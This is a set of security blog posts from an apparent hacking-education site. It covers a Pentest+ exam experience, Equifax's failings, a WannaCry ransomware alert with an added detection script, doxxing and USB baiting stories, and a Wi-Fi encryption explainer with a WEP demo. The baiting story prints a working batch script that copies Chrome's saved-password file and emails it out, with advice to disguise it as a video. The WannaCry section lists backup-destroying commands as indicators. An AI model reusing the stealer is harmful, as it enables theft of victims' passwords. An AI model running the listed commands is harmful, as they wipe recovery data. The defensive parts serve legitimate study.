Taking the beta CompTIA Pentester+ Test

Glenn Norman hacking

Okay: I’m a “trifecta instructor” of some 20 years, plus a stack of certs and degrees, including the CEH. I’m going in to test this morning after a quick review of scripting languages. Currently teaching Net+ and Sec+ so I’m pretty fresh, but have no real idea what to expect. Have you reviewed the Objectives? They’re huge and wildly all over the place … SOAP and REST? Really? I’ll post thoughts after taking the test this morning (3/10).


Oh, am I ever glad I’ve done a lot of coding/scripting, and reviewed my PHP, Python and Ruby before the test. Right off the bat I got a long series of long, detailed scenario and “drag and drop” questions that I let suck up too much time. One involved dragging lines or blocks of code from a random assortment into working locations in a script. Recognizing the language was instantly critical. Another “interactive” section comprised ten questions where I needed to identify one-liner payloads and the right control to block them. Be sure you’re very clear on the different types of SQL injection and XSS. The multiple-choice questions were, for a relief, pretty normal. Some did make clear to me some of the things I’ve never done: creating a sandbox, and setting up persistence on a target once it’s been compromised. I know the CEH pretty well (I’m on the review board), and no, it is not particularly similar to this test. The CEH concentrates on higher-level tools, like GUI exploit tools and specific-function apps. The Pentest+ seems much more focused on knowing low-level tools like nc and nmap, sometimes deeply into the switches and syntax. Definitely spend time working/playing with these so the long, complex multiple choices don’t become a blur. I got 120 questions for my 165 minutes, plus a lengthy pre-test agreement and a fairly quick post-test review, both off the clock. It was a race all the way, especially with the intricately detailed commands to pick in multiple-choice questions. I only finished 105, racing to the end, though since I got so many questions maybe I’ll get some slack for that. 😉 Notably, I did NOT see any policy, risk calculations, subnetting or crypto, and no SOAP or REST. Reading other people’s experiences, though, I’m betting there’s a huge question pool (that will hopefully get trimmed down) and your mileage will likely differ. Do I think I passed? I practically never think so walking out of a test, but I practically always do pass.
Is it a good alternative to the CEH? I’d say it’s more similar than different. Both certs are really much more focused on defense than offense. It still looks like the OSCP is the big dog of real pen testing, and that’s okay. We all need ladders with more rungs above us.

Equifax Did Three Simple Things Wrong and Hacked Us All

Glenn Norman hacking

So Equifax was hacked not once, but twice? No way. I don’t believe it. If you’ve been hacked twice, you’ve been hacked at least 3.6 million times (or pick any other really big number you like). And notification of this new hack, like the last one, came at a languid pace. I’ve gotta give it to Equifax: if I did something like this, anything like this in my own business, I’d quickly go to prison. Their people are just walking out the door.

What irritates the devil out of me is that Equifax took an equally languid attitude toward the security of my personal information by violating three simple tenets of security. I know it’s not easy to manage a corporate network; I’ve been there. But there are fundamental measures anyone with a brain or responsibility has to take in this field, and Equifax outright failed to do these obvious things.

Principle One: Isolation

Not every system needs to touch the internet. Of those that do, none of them should have access to anything but the absolute minimal resources (meaning other systems) they need to do their job. Production networks should always be totally isolated: human resources, accounts payable, management, customer service and every other production operation should be utterly isolated from each other. Even if systems within them are compromised via email or the internet, they should provide no ingress – absolutely none – across functions. Your deepest assets (consumer records would qualify) should be deeply isolated.

“But customer service needs access to records, and so do the customers!”

Yes, and that functionality is still available. You’ll do it via strongly encrypted, strongly authenticated, highly secured connections. In other words, the segregation cannot be simply VLANs on a switch or even casually configured internal routers. No. Every production network should be encapsulated, firewalled, filtered and logged as an independent unit, one that considers itself surrounded by hostile would-be intruders. If I can walk through your DMZ to your online-data network, that’s a problem. But if I can then pivot to other production networks, it’s time for a firing squad.

Principle Two: Patch Management

All the mainstream security firms will hound you about this: stay patched right up to the minute! There is a tiny minority who would dispute this, arguing that proper isolation makes urgent patch management a useless exercise in anxiety. For my money, I’m going to do both (and a lot more).

The likely culprit here was an unpatched Apache Struts installation. Frameworks like Struts are popular with developers but eventually have to be managed by sysadmins, who may not love or follow them as closely. This is where tight collaboration between these teams has to ensure things that need to be patched (which includes practically everything that’s installed) are included in patch management lists and applications. I shouldn’t have to say it but those lists and apps must be intensively managed. That’s a pain, but lawsuits are a bigger pain, and really big lawsuits can be fatally painful for organizations.

Principle Three: Competent Management

Repeat after me: a degree in music does not qualify you to be CSO. (A degree in music does not qualify ….) Experian did not get this memo, and hired as Chief Security Officer one Susan Mauldin, music major, whose LinkedIn profile was edited and made private shortly after the hack was revealed, likely because she listed no relevant qualifications whatsoever.

I have been working, studying and teaching in this field for some 20 years, and I consider myself hardly qualified for a job like CSO. You’re playing with blood and money in that job. Even if you’re a brilliant poker player, this is 3D chess played with lions. If you can only play Whack-a-Mole on the computer, you should not be managing computer security for a major corporation. You’ll need to be a fanatical, deeply involved security fiend to play cop or Batman for a company like Experian.

This whole question of qualifications goes far beyond this field. A Chief Scientist should, for instance, be a scientist. This quickly gets political (at least for me), so I’ll stop now. But what Experian has done is not political, and not forgivable. They’re doing something that affects far too many people to approach it lackadaisically.

Now, the kernel: if you’re a malicious hacker, you’re going to be looking for exactly these weaknesses. During the Reconnaissance stage, finding a weak CIO or CSO would be a whiff of blood in the water. If a simple scan reveals unpatched vulns, bingo. And if weak or nonexistent network segmentation lets me go bounding through the corporate cyberverse, oh joy, oh glad (assuming I’m that malicious hacker). If I’m NOT a cracker, I’d be testing exactly these same limits because I’d be a pen tester or researcher or bounty hunter or whatever. Right?

WannaCry or WannCrypt or WannaCrypt.RSM (high risk alert)

Ransom: of course it means (per the Cambridge dictionary) a large amount of money that is demanded in exchange for someone who has been taken prisoner, or sometimes for an animal; and nowadays, yes, for important data too. When what is held for ransom is vital data or information, the word was adapted and became known as ransomware.



This time we want to discuss a high-risk ransomware alert: WannaCry. According to SonicWall Security Center’s research, they noticed the ransomware in mid-April and published protections; the ransomware has since been updated to WannaCrypt version 2, whose UI looks like the image featured in this post. They also published the symptoms you will see when your system has been attacked, and we share them here to make you aware of the ransomware.

Ransomware causes denial of access to your vital information. Be aware of this.


SonicWall Security Center alerts the following:

WannaCrypt.RSM is a Trojan. A Trojan is a program that pretends to have a valid use, but in fact modifies the user’s computer in malicious ways. Trojans do not replicate or spread to other computers.

File Related Changes:
It drops the following file(s) on the system:

  • “C:\Documents and Settings\Default User\Start Menu\Programs\Startup\SDEF.tmp”
  • “C:\WINDOWS\Temp\!WannaDecryptor!.exe”
  • “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\SDCE.tmp”
  • “C:\WINDOWS\Temp\112881393834640_.bat”
  • “C:\Documents and Settings\Admin\Start Menu\Programs\Startup\SD8D.tmp”

It modifies the following additional file(s) on the system:

  • “C:\WINDOWS\system32\wbem\Logs\WMIC.LOG”

Process Related Changes:
It creates the following mutex(es):

  • “ZonesCacheCounterMutex”
  • “ZonesLockedCacheCounterMutex”
  • “c:!documents and settings!admin!local settings!history!history.ie5!”
  • “CTF.TMD.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003”
  • “CTF.TimListCache.FMPDefaultS-1-5-21-1078081533-842925246-854245398-1003MUTEX.DefaultS-1-5-21-1078081533-842925246-854245398-1003”
  • “CTF.Compart.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003”
  • “c:!documents and settings!admin!local settings!temporary internet files!content.ie5!”
  • “ZoneAttributeCacheCounterMutex”
  • “WininetConnectionMutex”
  • “CTF.Layouts.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003”
  • “CTF.Asm.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003”
  • “ZonesCounterMutex”
  • “CTF.LBES.MutexDefaultS-1-5-21-1078081533-842925246-854245398-1003”
  • “c:!documents and settings!admin!cookies!”

It creates the following process(es):

  • C:\WINDOWS\system32\taskkill.exe [ taskkill /f /im Microsoft.Exchange. ]
  • C:\WINDOWS\Temp\!WannaDecryptor!.exe [ !WannaDecryptor!.exe ]
  • C:\WINDOWS\Temp\b9b3965d1b218c63cd317ac33edcb942.exe [ \c:\windows\temp\b9b3965d1b218c63cd317ac33edcb942.exe ]
  • C:\WINDOWS\system32\taskkill.exe [ taskkill /f /im MSExchange ]
  • C:\WINDOWS\Temp\!WannaDecryptor!.exe [ !WannaDecryptor!.exe v ]
  • C:\WINDOWS\system32\cmd.exe [ cmd.exe /c start /b !WannaDecryptor!.exe v ]
  • C:\WINDOWS\system32\cmd.exe [ cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet ]
  • C:\WINDOWS\system32\wbem\wmic.exe [ wmic shadowcopy delete ]
  • C:\WINDOWS\Temp\!WannaDecryptor!.exe [ !WannaDecryptor!.exe c ]
  • C:\WINDOWS\system32\taskkill.exe [ taskkill /f /im sqlserver.exe ]
  • C:\WINDOWS\system32\cmd.exe [ cmd /c 112881393834640.bat ]
  • C:\WINDOWS\system32\taskkill.exe [ taskkill /f /im sqlwriter.exe ]
  • C:\WINDOWS\Temp\!WannaDecryptor!.exe [ !WannaDecryptor!.exe f ]
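
As an added, constructed example (not part of the SonicWall alert or this post), the following Python scans process-creation log records for the behaviours in the process list above: shadow-copy deletion, recovery disabled via bcdedit, backup catalog deletion, killing of SQL Server and Exchange processes, and the !WannaDecryptor!.exe binary. The log format, host names, users and timestamps are assumed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample process-creation log (one record per line, Sysmon-like fields).
# Not real telemetry: hosts, users and timestamps are made up for this example;
# the command lines on WS-07 mirror the process list in the alert above.
SAMPLE_LOG = """\
2017-05-12T10:01:03Z host=WS-07 user=admin cmd="cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"
2017-05-12T10:01:05Z host=WS-07 user=admin cmd="taskkill /f /im sqlserver.exe"
2017-05-12T10:01:06Z host=WS-07 user=admin cmd="cmd.exe /c start /b !WannaDecryptor!.exe v"
2017-05-12T10:02:11Z host=WS-12 user=backup cmd="vssadmin list shadows"
2017-05-12T10:03:00Z host=WS-03 user=jane cmd="notepad.exe report.txt"
"""

# Each indicator is one behaviour from the alert's process list. The ransomware's
# "delete shadows" is matched, but a benign "vssadmin list shadows" is not.
INDICATORS = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    "recovery_disabled": re.compile(
        r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+"
        r"(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
    "backup_catalog_deleted": re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I),
    "db_or_mail_service_killed": re.compile(
        r"taskkill(?:\.exe)?\s+/f\s+/im\s+(?:sqlserver\.exe|sqlwriter\.exe|MSExchange|Microsoft\.Exchange)",
        re.I),
    "wannadecryptor_binary": re.compile(r"!WannaDecryptor!\.exe", re.I),
}

LINE_RE = re.compile(r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$')


def classify_command(cmdline: str) -> list:
    """Return the names of every indicator the command line matches (empty if benign)."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def scan_log(text: str) -> dict:
    """Aggregate matches per host. Two or more distinct behaviours on one host is the
    combination the alert shows (shadow copies gone plus recovery disabled, and so on)."""
    per_host = defaultdict(lambda: {"indicators": set(), "commands": []})
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed record: skip it rather than abort the scan
        hits = classify_command(m["cmd"])
        if hits:
            per_host[m["host"]]["indicators"].update(hits)
            per_host[m["host"]]["commands"].append(m["cmd"])
    return {
        host: {"indicators": sorted(rec["indicators"]), "commands": rec["commands"],
               "verdict": "likely ransomware" if len(rec["indicators"]) >= 2 else "suspicious"}
        for host, rec in per_host.items()
    }


if __name__ == "__main__":
    for host, rec in scan_log(SAMPLE_LOG).items():
        print(host, rec["verdict"], rec["indicators"])
```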

Network Activity:
We observed the following DNS query/queries:

  • dist.torproject.org
  • www.dropbox.com
  • www.download.windowsupdate.com

It attempts to connect to the following remote servers:

  • 127.xxxxxx:1031
  • 127.xxxxxx:1037


As of May 12th 2017 we have observed a new variant of the WannaCrypt ransomware. It has been reported that version 2 of this ransomware has been deployed by its operators on a large international scale. It has wreaked havoc on the UK’s National Health Service, hitting at least 15 hospitals across the nation and causing denial of access to vital patient information. Other attacks include Spanish telecommunications companies such as Vodafone and Telefonica.


School For Hackers

For You!

Dox comes from “doc”, the abbreviation of the English word document, and is slang for documents. For attackers it is like a weapon, and for mad scientists it is a treasured habit. This method is employed to acquire information about someone by hacking, social engineering and searching publicly available information and social media websites like Facebook. It might be carried out for various reasons, for instance to persuade, to shame someone online, for business analysis, to aid law enforcement, for harassment and so forth.

Race Start

Min Mg Mg was curious about a girl he had barely met at a café. Since he was too embarrassed to introduce himself to her, he wished he could learn a bit of her background. Fortunately, he observed that the girl had taken a selfie and checked in on Facebook. “Yes, she currently has one vulnerability, ‘check in’; I need to test whether she has the other of the two, ‘public post’,” he said as he searched for her check-in on the page of the café where they were.

Race End

Never post publicly, and never disclose where you currently are on a social network. Since you might not realize who is doxxing you, you should not rest assured that no one is. We link you (Click here) to a demonstration video based on this article.


School for Hackers

Therefore, for you.

Join the family.

(Starry Sky)

Well-known Social Engineering Ways

A brilliant engineer would hack out a smart solution to the problem at hand, and consider it a compliment to be called a hacker. For more reading, see the article Hack to live at https://schoolforhackers.com/category/hacking-tools/. The sure thing is: you find the way to get what you want. Let’s talk about one of the five well-known social engineering methods we would like to discuss here.

  1. Baiting

This method is named baiting allegorically; it is similar to a phishing (fishing) attack. The items or goods a hacker uses to entice victims distinguish it from other types of social engineering. Baiters focus on human curiosity via the use of physical media, and they might offer users free audio and movie downloads.

Race Start

Min Mg Mg put some USB sticks around his roommates’ desks and the practical room. One of his roommates picked up a USB stick and was really curious to open it on his laptop, so he opened it. “Wow, many audio files here, and videos as well, that’s really lucky. Look, this video is interesting, its name is “Myself”; let’s check out the video to find out whose USB stick this is.” He was muttering as he opened the video. “Grandpa, I put in a video file hooked with a barb, a batch file –

```batch
@echo off
color 08
mkdir \a  C:\Users\%username%\Documents\sm
move /Y sendEmail.exe C:\Users\%username%\Documents\sm
PATH=%path%; C:\Users\%username%\Documents\sm
cd %appdata%\..\Local\Google\Chrome\"User Data"\Default\
xcopy "Login Data" C:\Users\%username%\Documents /S /D /Y /Q /H /C
cd C:\Users\%username%\Documents\
copy  /Y "Login Data" LoginData
cd  C:\Users\%username%\Documents\sm\
sendEmail -f from@gmail.com -u subject -m Message Body  -a C:\Users\%username%\Documents\LoginData -t to@gmail.com -s smtp.gmail.com:587 -xu user@gmail.com -xp password -o tls=yes
start http://www.animateit.net/data/media/feb2013/love_roses_03.gif
```


with the playful Windows script, and it is converted to an exe using a bat-to-exe converter. I bound it with a video file and the sendEmail.exe file. Soon I might have the Login Data file from his Google Chrome. When I put the Login Data into my Chrome profile I’ll see his saved passwords, if he saved his password in his browser,” Min Mg Mg said to grandpa as he stared at his screen.

Race End

Of course, we feel the happiness of finding a USB stick on the street and get curious. You might want to keep in mind that there are attackers out there who carry out these attacks on purpose, even if the script shown here is an amateur Windows script.

Hacking Tips from the Article, “How To Not Get Hacked, According To Expert Hackers”


TV personality Kevin Roose asked for it, and he got it. He wanted to research how people get hacked, so he decided to invite some prominent hackers to hack him. And hack him they did, cracking into everything from his webcam (pictures every two minutes) to all his online accounts (including banks).
Personally, I wouldn’t do this. It’s all too apparent, to the hack-literate, how people get hacked; the harder part is figuring out how NOT to.
Some of the solutions he proposes are familiar, like using a password manager, which is unfortunately a sword sharp on both sides. Others were new to me: have you heard of an app called Little Snitch? It monitors your outgoing traffic for suspicious activity. (Why is my computer uploading my credit card statements to China?)
And some “solutions” are as effective for the cracker as for the person trying to protect themselves: using a VPN, for instance. You’ll see more on that subject in this space going forward.
In the meantime, give this article a look, prospective crackers, hackers and security professionals.
(Image courtesy of User:Colin at wikimedia.org)

Are you that nice, or concerned about security?

When your neighbor sees the hotspot you broadcast, the very first thought he has is “oh, look at that, I’ve got my neighbor’s wifi, maybe I can get access” and click!
So what are you up to? Are you so nice as to let everyone access your wifi, or do you want privacy, or to share only with specific people? If you are concerned about network security, you are better off keeping it away from the public. Keep in mind that not everyone who comes into your network merely wants to use the internet access you shared.
In the movie Cinderella, the King held a party for the prince to choose the girl he loved, and the royal invitation said “Every maiden in the town is invited to the party,” even though the one the prince actually awaited was Cinderella. Unfortunately, Cinderella’s step-sisters and step-mother enjoyed the party too. Then the step-mother eavesdropped on the Royal Guard’s conversations and shortly afterwards blackmailed the Royal Guard. So we could consider that everyone who enjoyed the party was there not merely for the party, but to dig for their own advantage.
Immediately, min mg mg steps out of the movie moment and says, “Grandpa, we should maintain protection on our wifi; we had better not give access to everyone.” And the grandpa says, “Protection? Does it make sense if I keep this inside my iron cabinet?” “No, it doesn’t make any sense; we have to keep it outside so your smartphone and my laptop can access it and share the internet connection, but not others,” min mg mg says. “Look, here are many protection options that protect against most attacks, and firewall settings as well,” he says, accessing his small-business wifi access device via a browser. He continues, “Here are the options: WEP, WPA, WPA2.” “What in heaven?” Grandpa responds.

The grandson says, “Chill, I’ll walk you through it, grandpa. WEP is Wired Equivalent Privacy, the security algorithm for IEEE 802.11. It is recognizable by its key of 10 (or) 16 hexadecimal digits. Its primary encryption method is this: the ciphertext is generated by XORing (exclusive OR) the keystream, which RC4 (the encryption cipher) produces from the combination of the Initialization Vector (IV) and the key, with the plaintext. It was 64-bit encryption, later increased to 128-bit, yet the Wi-Fi Alliance announced in 2003 that WEP had been superseded by WPA. So the immediate question is: what is WPA? WPA is Wi-Fi Protected Access, IEEE 802.11i, sometimes referred to as the draft standard IEEE 802.11. It anticipated a yet more secure, more complex WPA2. WPA2 started in 2004. WEP provided data confidentiality comparable to a traditional wired network, and WPA was developed by the Wi-Fi Alliance to protect wireless computer networks. WPA-PSK (Pre-Shared Key) is the common WPA configuration, using 256-bit key encryption. It also comes with a system called Message Integrity Check, which determines whether an attacker has captured or altered packets passed between the access point and the client.

The most significant change between WPA and WPA2 is that the Advanced Encryption Standard (AES) must be used.” And Grandpa spills his guts: “Just go ahead and do your thing, oh my, headache, headache,” and continues, “so, use WPA, the more secure one.” He looks like he slightly got the point. Of course, having a bright grandson like min mg mg is gratifying.
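
As an added example that is not part of the original post, here is the WEP construction min mg mg describes, in Python: an RC4 keystream seeded with IV || key, XORed with the plaintext, with the 3-byte IV sent in the clear. It also shows why WEP was superseded: two frames that reuse an IV under the same key reuse the keystream, so XORing their ciphertexts yields the XOR of their plaintexts without the key. The key, IVs and messages are constructed sample values, and the CRC-32 integrity value real WEP appends is omitted.

```python
from typing import Optional

# Educational model of WEP's RC4 construction (added example; sample values constructed here).
# Real WEP also appends a CRC-32 ICV to the plaintext before encryption; it is omitted so the
# keystream/IV point stays in focus.


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """RC4: key-scheduling (KSA) over `seed`, then `length` bytes of the PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):                                   # KSA
        j = (j + S[i] + seed[i % len(seed)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                                # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: the 24-bit IV in the clear, then RC4(IV || key) XOR plaintext."""
    if len(iv) != 3:
        raise ValueError("WEP uses a 24-bit IV")
    if len(key) not in (5, 13):
        raise ValueError("WEP keys are 40-bit (5 bytes) or 104-bit (13 bytes)")
    return iv + xor_bytes(plaintext, rc4_keystream(iv + key, len(plaintext)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    return xor_bytes(body, rc4_keystream(iv + key, len(body)))


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> Optional[bytes]:
    """Same key and same IV means the same keystream, so C_a XOR C_b == P_a XOR P_b: the
    relationship between the plaintexts leaks with no key needed. Returns that XOR over the
    common length, or None when the IVs differ (no reuse)."""
    if frame_a[:3] != frame_b[:3]:
        return None
    n = min(len(frame_a), len(frame_b)) - 3
    return xor_bytes(frame_a[3:3 + n], frame_b[3:3 + n])


# Constructed sample values: a 40-bit key and one IV that gets reused.
SAMPLE_KEY = bytes.fromhex("0102030405")
SAMPLE_IV = bytes.fromhex("00000a")
IV_SPACE = 2 ** 24   # only 16,777,216 IVs: a busy network must repeat one eventually

if __name__ == "__main__":
    f1 = wep_encrypt(SAMPLE_KEY, SAMPLE_IV, b"grandpa's laptop")
    f2 = wep_encrypt(SAMPLE_KEY, SAMPLE_IV, b"neighbour's phone")
    print(wep_decrypt(SAMPLE_KEY, f1))
    print(keystream_reuse_leak(f1, f2) == xor_bytes(b"grandpa's laptop", b"neighbour's phone"))
```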
Young people have intelligent capabilities. We should enable them to implement their imaginations. Rather than teaching them how to do things, what we can do and what comes next in order are the needs. If you keep blocking their inspirations by any means, they will not be able to realize “why”, much less achieve great intelligence. That is the reason Hacker High School is going forward; they intend for youths to become great by doing great things with great humility. In our environment, likewise, we need someone like min mg mg to help us understand the technologies well, at least well enough to purchase technology materials at a fair deal.
Well, now min mg mg is getting busy for a school conference. He is working on a presentation based on a real-world scamming matter. “The Scammed IT Guy”, he just titled it.